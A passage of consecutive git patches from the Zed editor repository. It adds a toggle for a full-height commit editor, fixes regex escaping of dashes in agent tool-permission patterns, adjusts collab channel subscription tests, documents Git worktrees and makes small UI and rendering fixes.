[UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Added a `git::ToggleFillCommitEditor` action that expands the commit editor to fill the git panel's available vertical space. --------- Co-authored-by: Danilo Leal Co-authored-by: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> --- assets/keymaps/default-linux.json | 2 + assets/keymaps/default-macos.json | 1 + assets/keymaps/default-windows.json | 2 + crates/git/src/git.rs | 3 + crates/git_ui/src/git_panel.rs | 177 +++++++++++++++++++++++----- 5 files changed, 157 insertions(+), 28 deletions(-) diff --git a/assets/keymaps/default-linux.json b/assets/keymaps/default-linux.json index a72cd743596d0d..ba7f514766ee55 100644 --- a/assets/keymaps/default-linux.json +++ b/assets/keymaps/default-linux.json @@ -1071,6 +1071,8 @@ "ctrl-shift-enter": "git::Amend", "alt-up": "git_panel::FocusChanges", "alt-l": "git::GenerateCommitMessage", + "shift-escape": "git::ExpandCommitEditor", + "alt-shift-escape": "git::ToggleFillCommitEditor", }, }, { diff --git a/assets/keymaps/default-macos.json b/assets/keymaps/default-macos.json index 4f26eeeb8b3d0a..11750aa74148e7 100644 --- a/assets/keymaps/default-macos.json +++ b/assets/keymaps/default-macos.json @@ -1102,6 +1102,7 @@ "shift-tab": "git_panel::FocusChanges", "alt-up": "git_panel::FocusChanges", "shift-escape": "git::ExpandCommitEditor", + "alt-shift-escape": "git::ToggleFillCommitEditor", "alt-tab": "git::GenerateCommitMessage", }, }, diff --git a/assets/keymaps/default-windows.json b/assets/keymaps/default-windows.json index 8d60a68dbc26b6..2526a9412c6775 100644 --- a/assets/keymaps/default-windows.json +++ b/assets/keymaps/default-windows.json @@ -1069,6 +1069,8 @@ "ctrl-shift-enter": "git::Amend", "alt-up": "git_panel::FocusChanges", "alt-l": "git::GenerateCommitMessage", + "shift-escape": "git::ExpandCommitEditor", + "alt-shift-escape": "git::ToggleFillCommitEditor", }, }, { diff --git a/crates/git/src/git.rs b/crates/git/src/git.rs index debb7649ab7cc7..d5274d24b513c8 100644 --- a/crates/git/src/git.rs +++ b/crates/git/src/git.rs @@ -94,6 +94,9 @@ actions!( Cancel, /// Expands the commit message editor. ExpandCommitEditor, + /// Toggles whether the commit message editor fills all the available + /// vertical space within the git panel. + ToggleFillCommitEditor, /// Generates a commit message using AI. GenerateCommitMessage, /// Initializes a new git repository. diff --git a/crates/git_ui/src/git_panel.rs b/crates/git_ui/src/git_panel.rs index 62f8edcfbd87fc..f0900b56bccad1 100644 --- a/crates/git_ui/src/git_panel.rs +++ b/crates/git_ui/src/git_panel.rs @@ -16,7 +16,7 @@ use askpass::AskPassDelegate; use collections::{BTreeMap, HashMap, HashSet}; use db::kvp::KeyValueStore; use editor::{ - Direction, Editor, EditorElement, EditorMode, MultiBuffer, MultiBufferOffset, + Direction, Editor, EditorElement, EditorMode, MultiBuffer, MultiBufferOffset, SizingBehavior, actions::ExpandAllDiffHunks, }; use editor::{EditorStyle, RewrapOptions}; @@ -34,7 +34,7 @@ use git::status::{DiffStat, StageStatus}; use git::{Amend, Signoff, ToggleStaged, repository::RepoPath, status::FileStatus}; use git::{ ExpandCommitEditor, GitHostingProviderRegistry, RestoreTrackedFiles, StageAll, StashAll, - StashApply, StashPop, TrashUntrackedFiles, UnstageAll, + StashApply, StashPop, ToggleFillCommitEditor, TrashUntrackedFiles, UnstageAll, }; use gpui::{ Action, Anchor, AsyncApp, AsyncWindowContext, Bounds, ClickEvent, DismissEvent, Empty, Entity, @@ -247,6 +247,13 @@ pub fn register(workspace: &mut Workspace) { workspace.register_action(|workspace, _: &ExpandCommitEditor, window, cx| { CommitModal::toggle(workspace, None, window, cx) }); + workspace.register_action(|workspace, _: &ToggleFillCommitEditor, window, cx| { + if let Some(panel) = workspace.panel::(cx) { + panel.update(cx, |panel, cx| { + panel.toggle_fill_commit_editor(&Default::default(), window, cx) + }); + } + }); workspace.register_action(|workspace, _: &git::Init, window, cx| { if let Some(panel) = workspace.panel::(cx) { panel.update(cx, |panel, cx| panel.git_init(window, cx)); @@ -619,6 +626,8 @@ impl TruncatedPatch { pub struct GitPanel { pub(crate) active_repository: Option>, pub(crate) commit_editor: Entity, + /// Whether the commit editor should fill the vertical height of the panel. + commit_editor_expanded: bool, conflicted_count: usize, conflicted_staged_count: usize, add_coauthors: bool, @@ -809,6 +818,7 @@ impl GitPanel { let mut this = Self { active_repository, commit_editor, + commit_editor_expanded: false, conflicted_count: 0, conflicted_staged_count: 0, add_coauthors: true, @@ -4259,9 +4269,34 @@ impl GitPanel { } } + fn toggle_fill_commit_editor( + &mut self, + _: &ToggleFillCommitEditor, + _window: &mut Window, + cx: &mut Context, + ) { + self.commit_editor_expanded = !self.commit_editor_expanded; + self.commit_editor.update(cx, |editor, _cx| { + if self.commit_editor_expanded { + editor.set_mode(EditorMode::Full { + scale_ui_elements_with_buffer_font_size: false, + show_active_line_background: false, + sizing_behavior: SizingBehavior::ExcludeOverscrollMargin, + }) + } else { + editor.set_mode(EditorMode::AutoHeight { + min_lines: MAX_PANEL_EDITOR_LINES, + max_lines: Some(MAX_PANEL_EDITOR_LINES), + }) + } + }); + + cx.notify(); + } + fn expand_commit_editor( &mut self, - _: &git::ExpandCommitEditor, + _: &ExpandCommitEditor, window: &mut Window, cx: &mut Context, ) { @@ -4375,10 +4410,7 @@ impl GitPanel { let active_repository = self.active_repository.clone()?; let panel_editor_style = panel_editor_style(true, window, cx); let enable_coauthors = self.render_co_authors(cx); - let editor_focus_handle = self.commit_editor.focus_handle(cx); - let expand_tooltip_focus_handle = editor_focus_handle; - let branch = active_repository.read(cx).branch.clone(); let head_commit = active_repository.read(cx).head_commit.clone(); @@ -4414,6 +4446,7 @@ impl GitPanel { }; let footer = v_flex() + .when(self.commit_editor_expanded, |this| this.flex_1().min_h_0()) .child(PanelRepoFooter::new( display_name, branch, @@ -4448,7 +4481,10 @@ impl GitPanel { .cursor_text() .relative() .w_full() - .h(max_height + footer_size) + .when(self.commit_editor_expanded, |this| this.flex_1().min_h_0()) + .when(!self.commit_editor_expanded, |this| { + this.h(max_height + footer_size) + }) .border_t_1() .border_color(if title_exceeds_limit { cx.theme().status().warning_border @@ -4486,6 +4522,9 @@ impl GitPanel { ) .child( div() + .when(self.commit_editor_expanded, |this| { + this.flex_1().min_h_0().pb(footer_size) + }) .pr_2p5() .on_action(|&zed_actions::editor::MoveUp, _, cx| { cx.stop_propagation(); @@ -4500,19 +4539,21 @@ impl GitPanel { .absolute() .top_2() .right_2() - .opacity(0.5) - .hover(|this| this.opacity(1.0)) + .gap_px() + .opacity(0.6) + .hover(|s| s.opacity(1.0)) .child( - panel_icon_button("expand-commit-editor", IconName::Maximize) + panel_icon_button("expand-commit-editor", IconName::MaximizeAlt) .icon_size(IconSize::Small) - .size(ui::ButtonSize::Default) - .tooltip(move |_window, cx| { - Tooltip::for_action_in( - "Open Commit Modal", - &git::ExpandCommitEditor, - &expand_tooltip_focus_handle, - cx, - ) + .tooltip({ + move |_window, cx| { + Tooltip::for_action_in( + "Open Commit Modal", + &git::ExpandCommitEditor, + &editor_focus_handle, + cx, + ) + } }) .on_click(cx.listener({ move |_, _, window, cx| { @@ -4522,7 +4563,36 @@ impl GitPanel { ) } })), - ), + ) + .child({ + let (icon, label) = if self.commit_editor_expanded { + (IconName::Minimize, "Collapse Commit Editor") + } else { + (IconName::Maximize, "Expand Commit Editor") + }; + let focus_handle = self.focus_handle.clone(); + + panel_icon_button("fill-commit-editor", icon) + .icon_size(IconSize::Small) + .tooltip({ + move |_window, cx| { + Tooltip::for_action_in( + label, + &git::ToggleFillCommitEditor, + &focus_handle, + cx, + ) + } + }) + .on_click(cx.listener({ + move |_, _, window, cx| { + window.dispatch_action( + git::ToggleFillCommitEditor.boxed_clone(), + cx, + ) + } + })) + }), ), ); @@ -5932,15 +6002,22 @@ impl Render for GitPanel { .child( v_flex() .size_full() - .children(self.render_panel_header(window, cx)) - .map(|this| { - if let Some(repo) = self.active_repository.clone() - && has_entries - { - this.child(self.render_entries(has_write_access, repo, window, cx)) - } else { - this.child(self.render_empty_state(cx).into_any_element()) - } + .when(!self.commit_editor_expanded, |this| { + this.children(self.render_panel_header(window, cx)) + .map(|this| { + if let Some(repo) = self.active_repository.clone() + && has_entries + { + this.child(self.render_entries( + has_write_access, + repo, + window, + cx, + )) + } else { + this.child(self.render_empty_state(cx).into_any_element()) + } + }) }) .children(self.render_footer(window, cx)) .when(self.amend_pending, |this| { @@ -8275,4 +8352,48 @@ mod tests { ); }); } + + #[gpui::test] + async fn test_fill_commit_editor_toggle(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.background_executor.clone()); + fs.insert_tree( + "/root", + json!({ "project": { ".git": {}, "src": { "main.rs": "fn main() {}" } } }), + ) + .await; + + let project = Project::test(fs.clone(), [Path::new(path!("/root/project"))], cx).await; + let window_handle = + cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window_handle + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window_handle.into(), cx); + cx.executor().run_until_parked(); + + let panel = workspace.update_in(cx, GitPanel::new); + + panel.update_in(cx, |panel, window, cx| { + assert!(!panel.commit_editor_expanded); + assert!(matches!( + panel.commit_editor.read(cx).mode().clone(), + EditorMode::AutoHeight { .. } + )); + + panel.toggle_fill_commit_editor(&ToggleFillCommitEditor, window, cx); + assert!(panel.commit_editor_expanded); + assert!(matches!( + panel.commit_editor.read(cx).mode().clone(), + EditorMode::Full { .. } + )); + + panel.toggle_fill_commit_editor(&ToggleFillCommitEditor, window, cx); + assert!(!panel.commit_editor_expanded); + assert!(matches!( + panel.commit_editor.read(cx).mode().clone(), + EditorMode::AutoHeight { .. } + )); + }); + } } From 48e898eb1b2a11182b2de6063a18f2832c4629dc Mon Sep 17 00:00:00 2001 From: vladislav doster Date: Tue, 28 Apr 2026 14:18:44 -0500 Subject: [PATCH 081/231] docs: Fix typo in `EXTRACTION.md` (#55106) Self-Review Checklist: - [X] I've reviewed my own diff for quality, security, and reliability - [X] Unsafe blocks (if any) have justifying comments - [X] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [X] Tests cover the new/changed behavior - [X] Performance impact has been considered and is acceptable Release Notes: - Corrected a typo in the instructions regarding the 'pattern' format --- extensions/EXTRACTION.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/extensions/EXTRACTION.md b/extensions/EXTRACTION.md index 2bcc8e35d58933..5f3d74073366bc 100644 --- a/extensions/EXTRACTION.md +++ b/extensions/EXTRACTION.md @@ -30,7 +30,7 @@ cd $LANGNAME 2. Create an expressions.txt file somewhere (e.g. `~/projects/$LANGNAME.txt`) -This file takes the form of `patern==>replacement`, where the replacement is optional. +This file takes the form of `pattern==>replacement`, where the replacement is optional. Note whitespace matters so `ruby: ==>` is removing the `ruby:` prefix from a commit messages and adding a space after `==> ` means the replacement begins with a space. Regex capture groups are numbered `\1`, `\2`, etc. See: [Git Filter Repo Docs](https://htmlpreview.github.io/?https://github.com/newren/git-filter-repo/blob/docs/html/git-filter-repo.html) for more. From 76883d04055e0b1224d4cf62e9f1c9997695944d Mon Sep 17 00:00:00 2001 From: Matt Van Horn Date: Tue, 28 Apr 2026 14:57:41 -0700 Subject: [PATCH 082/231] agent: Stop over-escaping dashes in tool_permissions regex patterns (#51603) Fixes #51537 `regex::escape()` escapes dashes, but dashes are only special inside `[]` character classes in regex. This means tool_permissions patterns end up with unnecessary backslashes: **Before:** `^https?://typescript\-eslint\.io`, `^git\-lfs\s+pull(\s|$)` **After:** `^https?://typescript-eslint\.io`, `^git-lfs\s+pull(\s|$)` The fix adds a small `escape_for_pattern()` helper that calls `regex::escape()` then strips the unnecessary dash escaping via `.replace("\\-", "-")`. This is applied to all five call sites in `pattern_extraction.rs`. Tests updated to expect unescaped dashes, plus a new `test_dashes_are_not_escaped` test covering terminal commands, URLs, and paths with dashes. This PR was developed with AI assistance. Release Notes: - Fixed unnecessary escaping of dashes in agent tool permission patterns (e.g. `typescript\-eslint` is now `typescript-eslint`) --------- Co-authored-by: Matt Van Horn <455140+mvanhorn@users.noreply.github.com> --- crates/agent/src/pattern_extraction.rs | 41 +++++++++++++++++++++----- 1 file changed, 33 insertions(+), 8 deletions(-) diff --git a/crates/agent/src/pattern_extraction.rs b/crates/agent/src/pattern_extraction.rs index 7015d69827d728..3b1b93c64511a8 100644 --- a/crates/agent/src/pattern_extraction.rs +++ b/crates/agent/src/pattern_extraction.rs @@ -3,6 +3,15 @@ use shell_command_parser::{extract_commands, extract_terminal_command_prefix}; use std::path::{Path, PathBuf}; use url::Url; +/// Escapes a string for use in a regex pattern, but leaves dashes unescaped. +/// +/// `regex::escape()` escapes dashes, but they are only special inside `[]` +/// character classes. Leaving them unescaped produces cleaner patterns +/// (e.g. `^git-lfs\s+pull` instead of `^git\-lfs\s+pull`). +fn escape_for_pattern(text: &str) -> String { + regex::escape(text).replace("\\-", "-") +} + /// Normalize path separators to forward slashes for consistent cross-platform patterns. fn normalize_separators(path_str: &str) -> String { path_str.replace('\\', "/") @@ -64,14 +73,14 @@ pub fn extract_terminal_pattern(command: &str) -> Option { match tokens.as_slice() { [] => None, - [single] => Some(format!("^{}\\b", regex::escape(single))), + [single] => Some(format!("^{}\\b", escape_for_pattern(single))), [rest @ .., last] => Some(format!( "^{}\\s+{}(\\s|$)", rest.iter() - .map(|token| regex::escape(token)) + .map(|token| escape_for_pattern(token)) .collect::>() .join("\\s+"), - regex::escape(last) + escape_for_pattern(last) )), } } @@ -116,7 +125,7 @@ pub fn extract_path_pattern(path: &str) -> Option { if parent_str.is_empty() || parent_str == "/" { return None; } - Some(format!("^{}/", regex::escape(&parent_str))) + Some(format!("^{}/", escape_for_pattern(&parent_str))) } pub fn extract_path_pattern_display(path: &str) -> Option { @@ -156,7 +165,7 @@ pub fn extract_copy_move_pattern(input: &str) -> Option { if common_str.is_empty() || common_str == "/" { return None; } - Some(format!("^{}/", regex::escape(&common_str))) + Some(format!("^{}/", escape_for_pattern(&common_str))) } pub fn extract_copy_move_pattern_display(input: &str) -> Option { @@ -172,7 +181,7 @@ pub fn extract_copy_move_pattern_display(input: &str) -> Option { pub fn extract_url_pattern(url: &str) -> Option { let parsed = Url::parse(url).ok()?; let domain = parsed.host_str()?; - Some(format!("^https?://{}", regex::escape(domain))) + Some(format!("^https?://{}", escape_for_pattern(domain))) } pub fn extract_url_pattern_display(url: &str) -> Option { @@ -201,7 +210,7 @@ mod tests { ); assert_eq!( extract_terminal_pattern("git-lfs pull"), - Some("^git\\-lfs\\s+pull(\\s|$)".to_string()) + Some("^git-lfs\\s+pull(\\s|$)".to_string()) ); assert_eq!( extract_terminal_pattern("my_script arg"), @@ -244,7 +253,7 @@ mod tests { ); assert_eq!( extract_terminal_pattern("PAGER='less -R' git log"), - Some("^PAGER='less \\-R'\\s+git\\s+log(\\s|$)".to_string()) + Some("^PAGER='less -R'\\s+git\\s+log(\\s|$)".to_string()) ); // Path-like commands are rejected @@ -396,6 +405,22 @@ mod tests { ); } + #[test] + fn test_dashes_are_not_escaped() { + assert_eq!( + extract_terminal_pattern("git-lfs pull"), + Some("^git-lfs\\s+pull(\\s|$)".to_string()) + ); + assert_eq!( + extract_url_pattern("https://typescript-eslint.io/rules/no-unused-vars"), + Some("^https?://typescript-eslint\\.io".to_string()) + ); + assert_eq!( + extract_path_pattern("/my-project/sub-dir/file.rs"), + Some("^/my-project/sub-dir/".to_string()) + ); + } + #[test] fn test_special_chars_are_escaped() { assert_eq!( From 5770e1d6aebbf210a3ecf834589e2fb7e278b123 Mon Sep 17 00:00:00 2001 From: Conrad Irwin Date: Wed, 29 Apr 2026 00:12:38 +0200 Subject: [PATCH 083/231] Fix version check (#55032) Release Notes: - N/A --- crates/collab/src/rpc.rs | 8 -------- crates/collab/src/rpc/connection_pool.rs | 6 ------ .../tests/integration/channel_buffer_tests.rs | 5 +++++ .../collab/tests/integration/channel_tests.rs | 10 ++++++++++ crates/collab/tests/integration/test_server.rs | 17 ++++++++++++++++- 5 files changed, 31 insertions(+), 15 deletions(-) diff --git a/crates/collab/src/rpc.rs b/crates/collab/src/rpc.rs index 1294b06c8e553f..2fbbda032cc7ab 100644 --- a/crates/collab/src/rpc.rs +++ b/crates/collab/src/rpc.rs @@ -947,10 +947,6 @@ impl Server { )?; } - if should_auto_subscribe_to_channels(&zed_version) { - subscribe_user_to_channels(user.id, session).await?; - } - if let Some(incoming_call) = self.app_state.db.incoming_call_for_user(user.id).await? { @@ -2748,10 +2744,6 @@ async fn remove_contact( Ok(()) } -fn should_auto_subscribe_to_channels(version: &ZedVersion) -> bool { - version.0.minor < 139 -} - async fn subscribe_to_channels( _: proto::SubscribeToChannels, session: MessageContext, diff --git a/crates/collab/src/rpc/connection_pool.rs b/crates/collab/src/rpc/connection_pool.rs index 171dea37526e81..2dc790ea2321e9 100644 --- a/crates/collab/src/rpc/connection_pool.rs +++ b/crates/collab/src/rpc/connection_pool.rs @@ -36,12 +36,6 @@ impl ZedVersion { return false; } - // Since we hotfixed the changes to no longer connect to Collab automatically to Preview, we also need to reject - // versions in the range [v0.199.0, v0.199.1]. - if self.0 >= Version::new(0, 199, 0) && self.0 < Version::new(0, 199, 2) { - return false; - } - true } } diff --git a/crates/collab/tests/integration/channel_buffer_tests.rs b/crates/collab/tests/integration/channel_buffer_tests.rs index dd8ae9a2c02cfa..b40ce13c8753c1 100644 --- a/crates/collab/tests/integration/channel_buffer_tests.rs +++ b/crates/collab/tests/integration/channel_buffer_tests.rs @@ -657,6 +657,11 @@ async fn test_channel_buffer_changes( deterministic.advance_clock(ACKNOWLEDGE_DEBOUNCE_INTERVAL); server .simulate_long_connection_interruption(client_b.peer_id().unwrap(), deterministic.clone()); + + // Re-subscribe to channels after reconnection (simulates collab panel re-rendering) + client_b.initialize_channel_store(cx_b); + deterministic.run_until_parked(); + channel_store_b.read_with(cx_b, |channel_store, _| { assert!(!channel_store.has_channel_buffer_changed(channel_id)) }); diff --git a/crates/collab/tests/integration/channel_tests.rs b/crates/collab/tests/integration/channel_tests.rs index b42bb32f874f51..5de3984ece5e42 100644 --- a/crates/collab/tests/integration/channel_tests.rs +++ b/crates/collab/tests/integration/channel_tests.rs @@ -24,6 +24,11 @@ async fn test_core_channels( let client_a = server.create_client(cx_a, "user_a").await; let client_b = server.create_client(cx_b, "user_b").await; + // Subscribe to channels (simulates opening the collab panel) + client_a.initialize_channel_store(cx_a); + client_b.initialize_channel_store(cx_b); + executor.run_until_parked(); + let channel_a_id = client_a .channel_store() .update(cx_a, |channel_store, cx| { @@ -290,6 +295,11 @@ async fn test_core_channels( server.allow_connections(); executor.advance_clock(RECEIVE_TIMEOUT + RECONNECT_TIMEOUT); + + // Re-subscribe to channels after reconnection (simulates collab panel re-rendering) + client_a.initialize_channel_store(cx_a); + executor.run_until_parked(); + assert_channels( client_a.channel_store(), cx_a, diff --git a/crates/collab/tests/integration/test_server.rs b/crates/collab/tests/integration/test_server.rs index f077f5f35cb611..33bc373d058019 100644 --- a/crates/collab/tests/integration/test_server.rs +++ b/crates/collab/tests/integration/test_server.rs @@ -437,7 +437,12 @@ impl TestServer { admin: (&TestClient, &mut TestAppContext), members: &mut [(&TestClient, &mut TestAppContext)], ) -> ChannelId { - let (_, admin_cx) = admin; + let (admin_client, admin_cx) = admin; + + // Subscribe to channels (simulates opening the collab panel) + admin_client.initialize_channel_store(admin_cx); + admin_cx.executor().run_until_parked(); + let channel_id = admin_cx .read(ChannelStore::global) .update(admin_cx, |channel_store, cx| { @@ -447,6 +452,10 @@ impl TestServer { .unwrap(); for (member_client, member_cx) in members { + // Subscribe member to channels (simulates opening the collab panel) + member_client.initialize_channel_store(member_cx); + member_cx.executor().run_until_parked(); + admin_cx .read(ChannelStore::global) .update(admin_cx, |channel_store, cx| { @@ -665,6 +674,12 @@ impl TestClient { .await; } + /// Subscribe to channels. In production this happens when the user opens the collab panel. + pub fn initialize_channel_store(&self, cx: &mut TestAppContext) { + self.channel_store + .update(cx, |channel_store, _| channel_store.initialize()); + } + pub fn local_projects(&self) -> impl Deref>> + '_ { Ref::map(self.state.borrow(), |state| &state.local_projects) } From 6ba5a1a65c5a0021974c60285dcdfe6281dc837c Mon Sep 17 00:00:00 2001 From: Hans Donner Date: Wed, 29 Apr 2026 00:55:21 +0200 Subject: [PATCH 084/231] docs: Document Git worktrees (#55119) - Document Git worktrees as a general Git workflow in the Git docs - Add cross-links from AI, tasks, worktree trust, and remote development docs - Include the `git::Worktree` action in the Git action reference The main docs gap was that worktrees were mostly framed as an AI isolation feature, while Zed implements them as a general Git workflow through the title bar worktree picker. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --------- Co-authored-by: Danilo Leal Co-authored-by: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> --- docs/src/ai/parallel-agents.md | 2 +- docs/src/git.md | 32 ++++++++++++++++++++++++++++++++ docs/src/remote-development.md | 3 +++ docs/src/tasks.md | 2 +- docs/src/worktree-trust.md | 2 ++ 5 files changed, 39 insertions(+), 2 deletions(-) diff --git a/docs/src/ai/parallel-agents.md b/docs/src/ai/parallel-agents.md index f858d747de0d73..d574348ff6de43 100644 --- a/docs/src/ai/parallel-agents.md +++ b/docs/src/ai/parallel-agents.md @@ -63,7 +63,7 @@ A single project can contain multiple folders (a multi-root folder project). Age ## Worktree Isolation {#worktree-isolation} -If two threads might edit the same files, start one in a new Git worktree to give it an isolated checkout. +If two threads might edit the same files, start one in a new [Git worktree](../git.md#git-worktrees) to give it an isolated checkout. Worktrees are managed from the title bar. Click the worktree picker (to the right of the project picker) to switch between existing worktrees or create a new one. New worktrees are created in a detached HEAD state, so you won't accidentally share a branch between worktrees. diff --git a/docs/src/git.md b/docs/src/git.md index f7b524925195a8..aa24878ba04523 100644 --- a/docs/src/git.md +++ b/docs/src/git.md @@ -168,12 +168,43 @@ Find more information about setting the `preferred-line-length` in the [Configur Create a new branch using {#action git::Branch} or switch to an existing branch using {#action git::Switch} or {#action git::CheckoutBranch}. +When you are working in a [Git worktree](#git-worktrees), use the branch picker after switching to the worktree to create or check out the branch you want to use there. + ### Deleting Branches To delete a branch, open the branch switcher with {#action git::Switch}, find the branch you want to delete, and use the delete option. Zed will confirm before deleting to prevent accidental data loss. > **Note:** You cannot delete the branch you currently have checked out. Switch to a different branch first. +## Git Worktrees + +Git worktrees let you keep multiple checkouts of the same repository on disk at the same time. +This is useful when you want to work on more than one branch or task without stashing, rebuilding, or disturbing the files in your main checkout. + +Open the worktree picker from the title bar, next to the project picker, or by running {#action git::Worktree}. +From the picker, you can: + +- Create a new linked worktree either from the current branch or default branch +- Type a name to create a named worktree or let Zed automatically pick one for you +- Switch the current workspace to an existing worktree +- Open an existing worktree in a new window +- Delete linked worktrees that are not currently open in the project + +New worktrees are created in detached HEAD state. +After switching to the new worktree, use the branch picker next to the worktree picker to create a new branch or check out an existing, unused branch. +This keeps Zed from accidentally checking out the same branch in multiple worktrees. + +The directory used for new worktrees is controlled by the `git.worktree_directory` setting. +By default, Zed creates worktrees under `../worktrees` relative to the repository's working directory. + +See [All Settings](./reference/all-settings.md#git-worktree-directory) for examples. + +If your project contains multiple Git repositories (i.e., multi-root folders), Zed creates a linked worktree for each repository when creating a new worktree from the picker. +Non-Git folders in the same project are included in the new workspace as-is. + +To run setup steps after Zed creates a linked worktree, use the [`create_worktree` task hook](./tasks.md#hooks). +For agent-specific workflows, see [Worktree Isolation](./ai/parallel-agents.md#worktree-isolation). + ## Merge Conflicts When you encounter merge conflicts after a merge, rebase, or pull, Zed highlights the conflicting regions in your files and displays resolution buttons above each conflict. @@ -337,6 +368,7 @@ When viewing files with changes, Zed displays diff hunks that can be expanded or | {#action git::Branch} | {#kb git::Branch} | | {#action git::Switch} | {#kb git::Switch} | | {#action git::CheckoutBranch} | {#kb git::CheckoutBranch} | +| {#action git::Worktree} | {#kb git::Worktree} | | {#action git::Blame} | {#kb git::Blame} | | {#action git::StashAll} | {#kb git::StashAll} | | {#action git::StashPop} | {#kb git::StashPop} | diff --git a/docs/src/remote-development.md b/docs/src/remote-development.md index 9092de2cac33da..706afe67f4f1ba 100644 --- a/docs/src/remote-development.md +++ b/docs/src/remote-development.md @@ -262,6 +262,9 @@ Note that we deliberately disallow some options (for example `-t` or `-T`) that - [Running & Testing](./running-testing.md): Run tasks, terminal commands, and debugger sessions while you work remotely. +- [Git Worktrees](./git.md#git-worktrees): Create and switch between linked + Git worktrees. Zed supports the worktree picker in remote projects when the + remote connection is active. - [Configuring Zed](./configuring-zed.md): Manage shared and project settings, including `.zed/settings.json`. - [Agent Panel](./ai/agent-panel.md): Use AI workflows in remote projects. diff --git a/docs/src/tasks.md b/docs/src/tasks.md index 8364b460378a28..401cef6a4cc667 100644 --- a/docs/src/tasks.md +++ b/docs/src/tasks.md @@ -236,7 +236,7 @@ In addition to being spawned manually, tasks can be configured to run automatica The following hooks are currently supported: -- `create_worktree` — runs after Zed creates a new linked Git worktree, either directly through the CLI or through the UI with the worktree modal. The task is spawned with `ZED_WORKTREE_ROOT` pointing at the newly created worktree and `ZED_MAIN_GIT_WORKTREE` pointing at the original repository's working directory, which makes these hooks well-suited to copying untracked files (such as `.env` files) or running per-worktree setup commands. +- `create_worktree` — runs after Zed creates a new linked Git worktree, either directly through the CLI or from the [worktree picker](./git.md#git-worktrees). The task is spawned with `ZED_WORKTREE_ROOT` pointing at the newly created worktree and `ZED_MAIN_GIT_WORKTREE` pointing at the original repository's working directory, which makes these hooks well-suited to copying untracked files (such as `.env` files) or running per-worktree setup commands. Hook tasks are resolved from the same global and worktree-local `tasks.json` files as manually spawned tasks, and multiple tasks may register for the same hook; they all run when the hook fires. A hook task still benefits from the usual task configuration fields — `cwd`, `env`, `reveal`, `hide`, and so on — so you can control how much of the terminal UI is shown while it runs. diff --git a/docs/src/worktree-trust.md b/docs/src/worktree-trust.md index 3e22c46a14bf80..35c25cda0e2c19 100644 --- a/docs/src/worktree-trust.md +++ b/docs/src/worktree-trust.md @@ -8,6 +8,8 @@ description: "Configure which folders Zed trusts for running code and extensions A worktree in Zed is either a directory or a single file that Zed opens as a standalone "project". Zed opens a worktree each time you run `zed some/path`, drag a file or directory into Zed, or open your user settings file. +> Note: This is broader than a [Git worktree](./git.md#git-worktrees). A Git worktree is a linked checkout managed by Git; Zed's trust model applies to every opened file or folder root, including Git worktrees. + Every worktree opened may contain a `.zed/settings.json` file with extra configuration options that may require installing and spawning language servers or MCP servers. To let users choose based on their own threat model and risk tolerance, all worktrees start in Restricted Mode. Restricted Mode prevents downloading and running related items from `.zed/settings.json`. Until a worktree is trusted, Zed does not run related untrusted actions and waits for user confirmation. This gives users a chance to review project settings, MCP servers, and language servers. From 586da1aa4ff9362b9fe7f428eda5b272036c99f0 Mon Sep 17 00:00:00 2001 From: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> Date: Tue, 28 Apr 2026 20:31:31 -0300 Subject: [PATCH 085/231] agent_ui: Fix placeholder wrapping in the message editor (#55125) Fixes this: image Release Notes: - Fixed a bug where placeholder text in the agent panel's message editor wouldn't properly wrap. --- crates/agent_ui/src/conversation_view/thread_view.rs | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/crates/agent_ui/src/conversation_view/thread_view.rs b/crates/agent_ui/src/conversation_view/thread_view.rs index accc82a2ff7323..ed42c576a36db8 100644 --- a/crates/agent_ui/src/conversation_view/thread_view.rs +++ b/crates/agent_ui/src/conversation_view/thread_view.rs @@ -3211,10 +3211,9 @@ impl ThreadView { .child( v_flex() .when_some(max_content_width, |this, max_w| this.flex_basis(max_w)) - .when(max_content_width.is_none(), |this| this.w_full()) + .when(fills_container, |this| this.h_full()) .flex_shrink() .flex_grow_0() - .when(fills_container, |this| this.h_full()) .justify_between() .gap_2() .child( @@ -3275,6 +3274,7 @@ impl ThreadView { ) .child( h_flex() + .flex_wrap() .gap_1() .children(self.render_token_usage(cx)) .children(self.profile_selector.clone()) From 382ece98560bc15ad3cbc6ac02e61f30b2e45be7 Mon Sep 17 00:00:00 2001 From: John Tur Date: Wed, 29 Apr 2026 09:09:11 +0200 Subject: [PATCH 086/231] Implement luminance-based glyph dilation for macOS (#54886) Apple's text rendering stack dilates glyph outlines for text rendered with a light foreground color. Zed doesn't consider this nuance today; we populate our atlas using glyphs rendered with a dark foreground color. This means that, particularly in dark themes, text in Zed looks thin and blurry, and doesn't match the look of native macOS applications. This pull request replicates the native behavior of Core Graphics. Some reverse-engineering revealed that CG computes the foreground color luminance using the Rec. 709 formula ($Y=0.2126R + 0.7152B + 0.0722G$) and quantizes it into five levels (0, 0.25, 0.5, 0.75, and 1). Each level uses a different dilation factor. With this patch, we calculate this same luminance bucket and supply it as the foreground color during rasterization. The correct dilation will be applied, and we'll store this glyph in the atlas keyed by this luminance bucket. So, we'll generate and use up to 5 different bitmaps for each glyph based on its foreground color. I've confirmed that text rendered by Zed now exactly matches native applications like Safari, TextEdit, etc. Release Notes: - Improved text rendering clarity on macOS, particularly in dark themes. --------- Co-authored-by: Zed Zippy <234243425+zed-zippy[bot]@users.noreply.github.com> --- crates/gpui/src/platform.rs | 12 ++++-- crates/gpui/src/text_system.rs | 7 ++++ crates/gpui/src/window.rs | 